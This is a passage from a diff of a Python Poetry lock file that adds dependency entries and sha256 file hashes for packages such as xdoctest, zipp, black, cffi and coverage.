(>=1)", "pytest-timeout (>=1)", "packaging (>=20.0)"] + +[[package]] +name = "wrapt" +version = "1.14.1" +description = "Module for decorators, wrappers and monkey patching." +category = "main" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" + +[[package]] +name = "xdoctest" +version = "1.0.0" +description = "A rewrite of the builtin doctest module" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +colorama = {version = "*", optional = true, markers = "platform_system == \"Windows\" and extra == \"colors\""} +Pygments = {version = "*", optional = true, markers = "python_version >= \"3.5.0\" and extra == \"colors\""} +six = "*" + +[package.extras] +all = ["ipython", "ipython", "pygments", "pygments", "attrs", "cmake", "codecov", "colorama", "debugpy", "ipykernel", "ipykernel", "jedi", "jinja2", "jupyter-client", "jupyter-client", "jupyter-core", "nbconvert", "ninja", "pybind11", "pytest-cov", "pytest-cov", "pytest-cov", "pytest-cov", "pytest", "pytest", "pytest", "pytest", "pytest", "pytest", "scikit-build", "six", "typing"] +jupyter = ["ipython", "ipython", "attrs", "debugpy", "ipykernel", "ipykernel", "jedi", "jinja2", "jupyter-client", "jupyter-client", "jupyter-core", "nbconvert"] +optional = ["ipython", "ipython", "pygments", "pygments", "attrs", "colorama", "debugpy", "ipykernel", "ipykernel", "jedi", "jinja2", "jupyter-client", "jupyter-client", "jupyter-core", "nbconvert"] +colors = ["pygments", "pygments", "colorama"] +tests = ["cmake", "codecov", "ninja", "pybind11", "pytest-cov", "pytest-cov", "pytest-cov", "pytest-cov", "pytest", "pytest", "pytest", "pytest", "pytest", "pytest", "scikit-build", "typing"] + +[[package]] +name = "xlrd" +version = "2.0.1" +description = "Library for developers to extract data from Microsoft Excel (tm) .xls spreadsheet files" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" + +[package.extras] +build = ["wheel", "twine"] +docs = ["sphinx"] +test = ["pytest", "pytest-cov"] + +[[package]] +name = "zipp" +version = "3.8.0" +description = "Backport of pathlib-compatible object wrapper for zip files" +category = "main" +optional = false +python-versions = ">=3.7" + +[package.extras] +docs = ["sphinx", "jaraco.packaging (>=9)", "rst.linker (>=1.9)"] +testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "jaraco.itertools", "func-timeout", "pytest-black (>=0.3.7)", "pytest-mypy (>=0.9.1)"] + +[metadata] +lock-version = "1.1" +python-versions = "^3.7" +content-hash = "7b02fdc41561d5943de2187aad117b01f3a86551ce720f3e7204e35d5339fc1e" + +[metadata.files] +alabaster = [ + {file = "alabaster-0.7.12-py2.py3-none-any.whl", hash = "sha256:446438bdcca0e05bd45ea2de1668c1d9b032e1a9154c2c259092d77031ddd359"}, + {file = "alabaster-0.7.12.tar.gz", hash = "sha256:a661d72d58e6ea8a57f7a86e37d86716863ee5e92788398526d58b26a4e4dc02"}, +] +"aspy.refactor-imports" = [ + {file = "aspy.refactor_imports-2.3.0-py2.py3-none-any.whl", hash = "sha256:a60432fc0c0b948aa371da520b896ddcbbee71b1820eeda6d2c04f039bac13b9"}, + {file = "aspy.refactor_imports-2.3.0.tar.gz", hash = "sha256:5a7775b31e55a762f807c218a3f9f1a7ff1313d766605a301f2ed937cdfa242a"}, +] +atomicwrites = [ + {file = "atomicwrites-1.4.0-py2.py3-none-any.whl", hash = "sha256:6d1784dea7c0c8d4a5172b6c620f40b6e4cbfdf96d783691f2e1302a7b88e197"}, + {file = "atomicwrites-1.4.0.tar.gz", hash = "sha256:ae70396ad1a434f9c7046fd2dd196fc04b12f9e91ffb859164193be8b6168a7a"}, +] +attrs = [ + {file = "attrs-21.4.0-py2.py3-none-any.whl", hash = "sha256:2d27e3784d7a565d36ab851fe94887c5eccd6a463168875832a1be79c82828b4"}, + {file = "attrs-21.4.0.tar.gz", hash = "sha256:626ba8234211db98e869df76230a137c4c40a12d72445c45d5f5b716f076e2fd"}, +] +babel = [ + {file = "Babel-2.10.1-py3-none-any.whl", hash = "sha256:3f349e85ad3154559ac4930c3918247d319f21910d5ce4b25d439ed8693b98d2"}, + {file = "Babel-2.10.1.tar.gz", hash = "sha256:98aeaca086133efb3e1e2aad0396987490c8425929ddbcfe0550184fdc54cd13"}, +] +bandit = [ + {file = "bandit-1.7.4-py3-none-any.whl", hash = "sha256:412d3f259dab4077d0e7f0c11f50f650cc7d10db905d98f6520a95a18049658a"}, + {file = "bandit-1.7.4.tar.gz", hash = "sha256:2d63a8c573417bae338962d4b9b06fbc6080f74ecd955a092849e1e65c717bd2"}, +] +beautifulsoup4 = [ + {file = "beautifulsoup4-4.11.1-py3-none-any.whl", hash = "sha256:58d5c3d29f5a36ffeb94f02f0d786cd53014cf9b3b3951d42e0080d8a9498d30"}, + {file = "beautifulsoup4-4.11.1.tar.gz", hash = "sha256:ad9aa55b65ef2808eb405f46cf74df7fcb7044d5cbc26487f96eb2ef2e436693"}, +] +black = [ + {file = "black-22.3.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:2497f9c2386572e28921fa8bec7be3e51de6801f7459dffd6e62492531c47e09"}, + {file = "black-22.3.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:5795a0375eb87bfe902e80e0c8cfaedf8af4d49694d69161e5bd3206c18618bb"}, + {file = "black-22.3.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e3556168e2e5c49629f7b0f377070240bd5511e45e25a4497bb0073d9dda776a"}, + {file = "black-22.3.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:67c8301ec94e3bcc8906740fe071391bce40a862b7be0b86fb5382beefecd968"}, + {file = "black-22.3.0-cp310-cp310-win_amd64.whl", hash = "sha256:fd57160949179ec517d32ac2ac898b5f20d68ed1a9c977346efbac9c2f1e779d"}, + {file = "black-22.3.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:cc1e1de68c8e5444e8f94c3670bb48a2beef0e91dddfd4fcc29595ebd90bb9ce"}, + {file = "black-22.3.0-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d2fc92002d44746d3e7db7cf9313cf4452f43e9ea77a2c939defce3b10b5c82"}, + {file = "black-22.3.0-cp36-cp36m-win_amd64.whl", hash = "sha256:a6342964b43a99dbc72f72812bf88cad8f0217ae9acb47c0d4f141a6416d2d7b"}, + {file = "black-22.3.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:328efc0cc70ccb23429d6be184a15ce613f676bdfc85e5fe8ea2a9354b4e9015"}, + {file = "black-22.3.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:06f9d8846f2340dfac80ceb20200ea5d1b3f181dd0556b47af4e8e0b24fa0a6b"}, + {file = "black-22.3.0-cp37-cp37m-win_amd64.whl", hash = "sha256:ad4efa5fad66b903b4a5f96d91461d90b9507a812b3c5de657d544215bb7877a"}, + {file = "black-22.3.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e8477ec6bbfe0312c128e74644ac8a02ca06bcdb8982d4ee06f209be28cdf163"}, + {file = "black-22.3.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:637a4014c63fbf42a692d22b55d8ad6968a946b4a6ebc385c5505d9625b6a464"}, + {file = "black-22.3.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:863714200ada56cbc366dc9ae5291ceb936573155f8bf8e9de92aef51f3ad0f0"}, + {file = "black-22.3.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10dbe6e6d2988049b4655b2b739f98785a884d4d6b85bc35133a8fb9a2233176"}, + {file = "black-22.3.0-cp38-cp38-win_amd64.whl", hash = "sha256:cee3e11161dde1b2a33a904b850b0899e0424cc331b7295f2a9698e79f9a69a0"}, + {file = "black-22.3.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5891ef8abc06576985de8fa88e95ab70641de6c1fca97e2a15820a9b69e51b20"}, + {file = "black-22.3.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:30d78ba6bf080eeaf0b7b875d924b15cd46fec5fd044ddfbad38c8ea9171043a"}, + {file = "black-22.3.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ee8f1f7228cce7dffc2b464f07ce769f478968bfb3dd1254a4c2eeed84928aad"}, + {file = "black-22.3.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6ee227b696ca60dd1c507be80a6bc849a5a6ab57ac7352aad1ffec9e8b805f21"}, + {file = "black-22.3.0-cp39-cp39-win_amd64.whl", hash = "sha256:9b542ced1ec0ceeff5b37d69838106a6348e60db7b8fdd245294dc1d26136265"}, + {file = "black-22.3.0-py3-none-any.whl", hash = "sha256:bc58025940a896d7e5356952228b68f793cf5fcb342be703c3a2669a1488cb72"}, + {file = "black-22.3.0.tar.gz", hash = "sha256:35020b8886c022ced9282b51b5a875b6d1ab0c387b31a065b84db7c33085ca79"}, +] +bs4 = [ + {file = "bs4-0.0.1.tar.gz", hash = "sha256:36ecea1fd7cc5c0c6e4a1ff075df26d50da647b75376626cc186e2212886dd3a"}, +] +cached-property = [ + {file = "cached-property-1.5.2.tar.gz", hash = "sha256:9fa5755838eecbb2d234c3aa390bd80fbd3ac6b6869109bfc1b499f7bd89a130"}, + {file = "cached_property-1.5.2-py2.py3-none-any.whl", hash = "sha256:df4f613cf7ad9a588cc381aaf4a512d26265ecebd5eb9e1ba12f1319eb85a6a0"}, +] +certifi = [ + {file = "certifi-2022.5.18.1-py3-none-any.whl", hash = "sha256:f1d53542ee8cbedbe2118b5686372fb33c297fcd6379b050cca0ef13a597382a"}, + {file = "certifi-2022.5.18.1.tar.gz", hash = "sha256:9c5705e395cd70084351dd8ad5c41e65655e08ce46f2ec9cf6c2c08390f71eb7"}, +] +cffi = [ + {file = "cffi-1.15.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:c2502a1a03b6312837279c8c1bd3ebedf6c12c4228ddbad40912d671ccc8a962"}, + {file = "cffi-1.15.0-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:23cfe892bd5dd8941608f93348c0737e369e51c100d03718f108bf1add7bd6d0"}, + {file = "cffi-1.15.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:41d45de54cd277a7878919867c0f08b0cf817605e4eb94093e7516505d3c8d14"}, + {file = "cffi-1.15.0-cp27-cp27m-win32.whl", hash = "sha256:4a306fa632e8f0928956a41fa8e1d6243c71e7eb59ffbd165fc0b41e316b2474"}, + {file = "cffi-1.15.0-cp27-cp27m-win_amd64.whl", hash = "sha256:e7022a66d9b55e93e1a845d8c9eba2a1bebd4966cd8bfc25d9cd07d515b33fa6"}, + {file = "cffi-1.15.0-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:14cd121ea63ecdae71efa69c15c5543a4b5fbcd0bbe2aad864baca0063cecf27"}, + {file = "cffi-1.15.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:d4d692a89c5cf08a8557fdeb329b82e7bf609aadfaed6c0d79f5a449a3c7c023"}, + {file = "cffi-1.15.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0104fb5ae2391d46a4cb082abdd5c69ea4eab79d8d44eaaf79f1b1fd806ee4c2"}, + {file = "cffi-1.15.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:91ec59c33514b7c7559a6acda53bbfe1b283949c34fe7440bcf917f96ac0723e"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:f5c7150ad32ba43a07c4479f40241756145a1f03b43480e058cfd862bf5041c7"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:00c878c90cb53ccfaae6b8bc18ad05d2036553e6d9d1d9dbcf323bbe83854ca3"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:abb9a20a72ac4e0fdb50dae135ba5e77880518e742077ced47eb1499e29a443c"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a5263e363c27b653a90078143adb3d076c1a748ec9ecc78ea2fb916f9b861962"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f54a64f8b0c8ff0b64d18aa76675262e1700f3995182267998c31ae974fbc382"}, + {file = "cffi-1.15.0-cp310-cp310-win32.whl", hash = "sha256:c21c9e3896c23007803a875460fb786118f0cdd4434359577ea25eb556e34c55"}, + {file = "cffi-1.15.0-cp310-cp310-win_amd64.whl", hash = "sha256:5e069f72d497312b24fcc02073d70cb989045d1c91cbd53979366077959933e0"}, + {file = "cffi-1.15.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:64d4ec9f448dfe041705426000cc13e34e6e5bb13736e9fd62e34a0b0c41566e"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2756c88cbb94231c7a147402476be2c4df2f6078099a6f4a480d239a8817ae39"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3b96a311ac60a3f6be21d2572e46ce67f09abcf4d09344c49274eb9e0bf345fc"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:75e4024375654472cc27e91cbe9eaa08567f7fbdf822638be2814ce059f58032"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:59888172256cac5629e60e72e86598027aca6bf01fa2465bdb676d37636573e8"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:27c219baf94952ae9d50ec19651a687b826792055353d07648a5695413e0c605"}, + {file = "cffi-1.15.0-cp36-cp36m-win32.whl", hash = "sha256:4958391dbd6249d7ad855b9ca88fae690783a6be9e86df65865058ed81fc860e"}, + {file = "cffi-1.15.0-cp36-cp36m-win_amd64.whl", hash = "sha256:f6f824dc3bce0edab5f427efcfb1d63ee75b6fcb7282900ccaf925be84efb0fc"}, + {file = "cffi-1.15.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:06c48159c1abed75c2e721b1715c379fa3200c7784271b3c46df01383b593636"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:c2051981a968d7de9dd2d7b87bcb9c939c74a34626a6e2f8181455dd49ed69e4"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:fd8a250edc26254fe5b33be00402e6d287f562b6a5b2152dec302fa15bb3e997"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:91d77d2a782be4274da750752bb1650a97bfd8f291022b379bb8e01c66b4e96b"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:45db3a33139e9c8f7c09234b5784a5e33d31fd6907800b316decad50af323ff2"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:263cc3d821c4ab2213cbe8cd8b355a7f72a8324577dc865ef98487c1aeee2bc7"}, + {file = "cffi-1.15.0-cp37-cp37m-win32.whl", hash = "sha256:17771976e82e9f94976180f76468546834d22a7cc404b17c22df2a2c81db0c66"}, + {file = "cffi-1.15.0-cp37-cp37m-win_amd64.whl", hash = "sha256:3415c89f9204ee60cd09b235810be700e993e343a408693e80ce7f6a40108029"}, + {file = "cffi-1.15.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:4238e6dab5d6a8ba812de994bbb0a79bddbdf80994e4ce802b6f6f3142fcc880"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:0808014eb713677ec1292301ea4c81ad277b6cdf2fdd90fd540af98c0b101d20"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:57e9ac9ccc3101fac9d6014fba037473e4358ef4e89f8e181f8951a2c0162024"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8b6c2ea03845c9f501ed1313e78de148cd3f6cad741a75d43a29b43da27f2e1e"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:10dffb601ccfb65262a27233ac273d552ddc4d8ae1bf93b21c94b8511bffe728"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:786902fb9ba7433aae840e0ed609f45c7bcd4e225ebb9c753aa39725bb3e6ad6"}, + {file = "cffi-1.15.0-cp38-cp38-win32.whl", hash = "sha256:da5db4e883f1ce37f55c667e5c0de439df76ac4cb55964655906306918e7363c"}, + {file = "cffi-1.15.0-cp38-cp38-win_amd64.whl", hash = "sha256:181dee03b1170ff1969489acf1c26533710231c58f95534e3edac87fff06c443"}, + {file = "cffi-1.15.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:45e8636704eacc432a206ac7345a5d3d2c62d95a507ec70d62f23cd91770482a"}, + {file = "cffi-1.15.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:31fb708d9d7c3f49a60f04cf5b119aeefe5644daba1cd2a0fe389b674fd1de37"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:6dc2737a3674b3e344847c8686cf29e500584ccad76204efea14f451d4cc669a"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:74fdfdbfdc48d3f47148976f49fab3251e550a8720bebc99bf1483f5bfb5db3e"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ffaa5c925128e29efbde7301d8ecaf35c8c60ffbcd6a1ffd3a552177c8e5e796"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3f7d084648d77af029acb79a0ff49a0ad7e9d09057a9bf46596dac9514dc07df"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:ef1f279350da2c586a69d32fc8733092fd32cc8ac95139a00377841f59a3f8d8"}, + {file = "cffi-1.15.0-cp39-cp39-win32.whl", hash = "sha256:2a23af14f408d53d5e6cd4e3d9a24ff9e05906ad574822a10563efcef137979a"}, + {file = "cffi-1.15.0-cp39-cp39-win_amd64.whl", hash = "sha256:3773c4d81e6e818df2efbc7dd77325ca0dcb688116050fb2b3011218eda36139"}, + {file = "cffi-1.15.0.tar.gz", hash = "sha256:920f0d66a896c2d99f0adbb391f990a84091179542c205fa53ce5787aff87954"}, +] +cfgv = [ + {file = "cfgv-3.3.1-py2.py3-none-any.whl", hash = "sha256:c6a0883f3917a037485059700b9e75da2464e6c27051014ad85ba6aaa5884426"}, + {file = "cfgv-3.3.1.tar.gz", hash = "sha256:f5a830efb9ce7a445376bb66ec94c638a9787422f96264c98edc6bdeed8ab736"}, +] +chardet = [ + {file = "chardet-3.0.4-py2.py3-none-any.whl", hash = "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"}, + {file = "chardet-3.0.4.tar.gz", hash = "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae"}, +] +charset-normalizer = [ + {file = "charset-normalizer-2.0.12.tar.gz", hash = "sha256:2857e29ff0d34db842cd7ca3230549d1a697f96ee6d3fb071cfa6c7393832597"}, + {file = "charset_normalizer-2.0.12-py3-none-any.whl", hash = "sha256:6881edbebdb17b39b4eaaa821b438bf6eddffb4468cf344f09f89def34a8b1df"}, +] +click = [ + {file = "click-8.1.3-py3-none-any.whl", hash = "sha256:bb4d8133cb15a609f44e8213d9b391b0809795062913b383c62be0ee95b1db48"}, + {file = "click-8.1.3.tar.gz", hash = "sha256:7682dc8afb30297001674575ea00d1814d808d6a36af415a82bd481d37ba7b8e"}, +] +colorama = [ + {file = "colorama-0.4.4-py2.py3-none-any.whl", hash = "sha256:9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2"}, + {file = "colorama-0.4.4.tar.gz", hash = "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"}, +] +coverage = [ + {file = "coverage-6.4.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f1d5aa2703e1dab4ae6cf416eb0095304f49d004c39e9db1d86f57924f43006b"}, + {file = "coverage-6.4.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:4ce1b258493cbf8aec43e9b50d89982346b98e9ffdfaae8ae5793bc112fb0068"}, + {file = "coverage-6.4.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83c4e737f60c6936460c5be330d296dd5b48b3963f48634c53b3f7deb0f34ec4"}, + {file = "coverage-6.4.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84e65ef149028516c6d64461b95a8dbcfce95cfd5b9eb634320596173332ea84"}, + {file = "coverage-6.4.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f69718750eaae75efe506406c490d6fc5a6161d047206cc63ce25527e8a3adad"}, + {file = "coverage-6.4.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e57816f8ffe46b1df8f12e1b348f06d164fd5219beba7d9433ba79608ef011cc"}, + {file = "coverage-6.4.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:01c5615d13f3dd3aa8543afc069e5319cfa0c7d712f6e04b920431e5c564a749"}, + {file = "coverage-6.4.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:75ab269400706fab15981fd4bd5080c56bd5cc07c3bccb86aab5e1d5a88dc8f4"}, + {file = "coverage-6.4.1-cp310-cp310-win32.whl", hash = "sha256:a7f3049243783df2e6cc6deafc49ea123522b59f464831476d3d1448e30d72df"}, + {file = "coverage-6.4.1-cp310-cp310-win_amd64.whl", hash = "sha256:ee2ddcac99b2d2aec413e36d7a429ae9ebcadf912946b13ffa88e7d4c9b712d6"}, + {file = "coverage-6.4.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:fb73e0011b8793c053bfa85e53129ba5f0250fdc0392c1591fd35d915ec75c46"}, + {file = "coverage-6.4.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:106c16dfe494de3193ec55cac9640dd039b66e196e4641fa8ac396181578b982"}, + {file = "coverage-6.4.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:87f4f3df85aa39da00fd3ec4b5abeb7407e82b68c7c5ad181308b0e2526da5d4"}, + {file = "coverage-6.4.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:961e2fb0680b4f5ad63234e0bf55dfb90d302740ae9c7ed0120677a94a1590cb"}, + {file = "coverage-6.4.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:cec3a0f75c8f1031825e19cd86ee787e87cf03e4fd2865c79c057092e69e3a3b"}, + {file = "coverage-6.4.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:129cd05ba6f0d08a766d942a9ed4b29283aff7b2cccf5b7ce279d50796860bb3"}, + {file = "coverage-6.4.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:bf5601c33213d3cb19d17a796f8a14a9eaa5e87629a53979a5981e3e3ae166f6"}, + {file = "coverage-6.4.1-cp37-cp37m-win32.whl", hash = "sha256:269eaa2c20a13a5bf17558d4dc91a8d078c4fa1872f25303dddcbba3a813085e"}, + {file = "coverage-6.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:f02cbbf8119db68455b9d763f2f8737bb7db7e43720afa07d8eb1604e5c5ae28"}, + {file = "coverage-6.4.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ffa9297c3a453fba4717d06df579af42ab9a28022444cae7fa605af4df612d54"}, + {file = "coverage-6.4.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:145f296d00441ca703a659e8f3eb48ae39fb083baba2d7ce4482fb2723e050d9"}, + {file = "coverage-6.4.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d44996140af8b84284e5e7d398e589574b376fb4de8ccd28d82ad8e3bea13"}, + {file = "coverage-6.4.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2bd9a6fc18aab8d2e18f89b7ff91c0f34ff4d5e0ba0b33e989b3cd4194c81fd9"}, + {file = "coverage-6.4.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3384f2a3652cef289e38100f2d037956194a837221edd520a7ee5b42d00cc605"}, + {file = "coverage-6.4.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9b3e07152b4563722be523e8cd0b209e0d1a373022cfbde395ebb6575bf6790d"}, + {file = "coverage-6.4.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:1480ff858b4113db2718848d7b2d1b75bc79895a9c22e76a221b9d8d62496428"}, + {file = "coverage-6.4.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:865d69ae811a392f4d06bde506d531f6a28a00af36f5c8649684a9e5e4a85c83"}, + {file = "coverage-6.4.1-cp38-cp38-win32.whl", hash = "sha256:664a47ce62fe4bef9e2d2c430306e1428ecea207ffd68649e3b942fa8ea83b0b"}, + {file = "coverage-6.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:26dff09fb0d82693ba9e6231248641d60ba606150d02ed45110f9ec26404ed1c"}, + {file = "coverage-6.4.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d9c80df769f5ec05ad21ea34be7458d1dc51ff1fb4b2219e77fe24edf462d6df"}, + {file = "coverage-6.4.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:39ee53946bf009788108b4dd2894bf1349b4e0ca18c2016ffa7d26ce46b8f10d"}, + {file = "coverage-6.4.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f5b66caa62922531059bc5ac04f836860412f7f88d38a476eda0a6f11d4724f4"}, + {file = "coverage-6.4.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fd180ed867e289964404051a958f7cccabdeed423f91a899829264bb7974d3d3"}, + {file = "coverage-6.4.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:84631e81dd053e8a0d4967cedab6db94345f1c36107c71698f746cb2636c63e3"}, + {file = "coverage-6.4.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:8c08da0bd238f2970230c2a0d28ff0e99961598cb2e810245d7fc5afcf1254e8"}, + {file = "coverage-6.4.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:d42c549a8f41dc103a8004b9f0c433e2086add8a719da00e246e17cbe4056f72"}, + {file = "coverage-6.4.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:309ce4a522ed5fca432af4ebe0f32b21d6d7ccbb0f5fcc99290e71feba67c264"}, + {file = "coverage-6.4.1-cp39-cp39-win32.whl", hash = "sha256:fdb6f7bd51c2d1714cea40718f6149ad9be6a2ee7d93b19e9f00934c0f2a74d9"}, + {file = "coverage-6.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:342d4aefd1c3e7f620a13f4fe563154d808b69cccef415415aece4c786665397"}, + {file = "coverage-6.4.1-pp36.pp37.pp38-none-any.whl", hash = "sha256:4803e7ccf93230accb928f3a68f00ffa80a88213af98ed338a57ad021ef06815"}, + {file = "coverage-6.4.1.tar.gz", hash = "sha256:4321f075095a096e70aff1d002030ee612b65a205a0a0f5b815280d5dc58100c"}, +] +darglint = [ + {file = "darglint-1.8.1-py3-none-any.whl", hash = "sha256:5ae11c259c17b0701618a20c3da343a3eb98b3bc4b5a83d31cdd94f5ebdced8d"}, + {file = "darglint-1.8.1.tar.gz", hash = "sha256:080d5106df149b199822e7ee7deb9c012b49891538f14a11be681044f0bb20da"}, +] +deprecated = [ + {file = "Deprecated-1.2.13-py2.py3-none-any.whl", hash = "sha256:64756e3e14c8c5eea9795d93c524551432a0be75629f8f29e67ab8caf076c76d"}, + {file = "Deprecated-1.2.13.tar.gz", hash = "sha256:43ac5335da90c31c24ba028af536a91d41d53f9e6901ddb021bcc572ce44e38d"}, +] +distlib = [ + {file = 